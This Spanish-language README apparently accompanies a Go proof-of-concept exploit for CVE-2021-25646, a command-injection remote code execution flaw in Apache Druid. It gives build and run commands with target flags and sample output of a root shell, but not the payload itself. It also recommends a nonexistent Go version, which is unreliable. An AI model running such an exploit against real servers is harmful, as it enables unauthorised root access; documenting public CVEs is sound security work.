
Una prueba de concepto para el CVE-2021-25646, que permite la inyección de comandos.
Este repositorio contiene una prueba de concepto (PoC) para CVE-2021-25646, una vulnerabilidad crítica de ejecución remota de código en Apache Druid.
El exploit está escrito en Go y permite la inyección de comandos de forma interactiva a través de la terminal.
Necesitas Go instalado (versión 2.23.4 recomendada).
go build .
Esto generará un binario en el directorio actual.
Puedes ejecutar el exploit compilando el binario o directamente con go run.
-i : Dirección IP del servidor Druid objetivo (obligatorio)-p : Puerto del servidor Druid objetivo (obligatorio)-proxy : Especifica la URL del proxy (opcional)Ejecutar el binario compilado:
./cve -i 127.0.0.1 -p 8888
O ejecutar directamente con Go:
go run main.go -i 127.0.0.1 -p 8888
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
Vulnerabilidad:
El exploit abusa de una validación de entrada incorrecta en el componente indexer de Druid, específicamente en la API task, lo que permite la inyección de comandos mediante cargas JSON manipuladas.
Referencias:
Este software se proporciona solo con fines educativos.
El autor no es responsable de ningún uso indebido o daño causado por este código.
Siempre obtén la autorización adecuada antes de probar cualquier sistema.